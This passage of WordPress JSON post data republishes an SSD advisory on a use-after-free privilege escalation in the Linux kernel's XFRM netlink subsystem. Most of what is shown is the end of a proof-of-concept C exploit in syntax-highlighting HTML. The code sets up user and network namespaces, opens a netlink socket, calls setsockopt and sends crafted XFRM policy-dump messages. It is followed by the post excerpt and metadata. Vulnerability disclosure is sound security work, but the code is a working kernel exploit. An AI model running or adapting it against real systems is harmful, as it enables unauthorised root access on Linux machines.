crayon-striped-line\" id=\"crayon-5a17495be4781046175041-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">XFRM_MSG_GETPOLICY<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_flags<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MATCH<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">NLM_F_MULTI<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">NLM_F_REQUEST<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_seq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">nlmsg_pid<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5a17495be4781046175041-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-59\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-60\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-61\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">nlmsghdr *<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-62\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sendto<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">nlmsg_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr_nl<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;sendto&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-71\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-73\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-74\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-75\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWUSER<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5a17495be4781046175041-76\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;unshare(CLONE_NEWUSER)&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-77\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-78\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-79\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">unshare<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">CLONE_NEWNET<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-80\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">perror<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;unshare(CLONE_NEWNET)&quot;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-81\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-82\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-83\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-84\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-85\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">msg_policy *<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-87\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-88\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">create_nl_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">100<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">do_setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-92\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-93\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">init_policy_dump<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-94\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span 
class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a17495be4781046175041-95\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a17495be4781046175041-96\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3535\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/11\/Linux1-300x30.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 23 Nov 2017 06:59:02 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem &#8211; XFRM. Netlink is used to transfer information between the kernel and user-space processes. 
It consists of a standard sockets-based interface for user space processes and an internal kernel &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3535\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Linux Kernel XFRM Privilege Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11946,10757,13145],"class_list":["post-10588","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10588"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10588\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10588"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}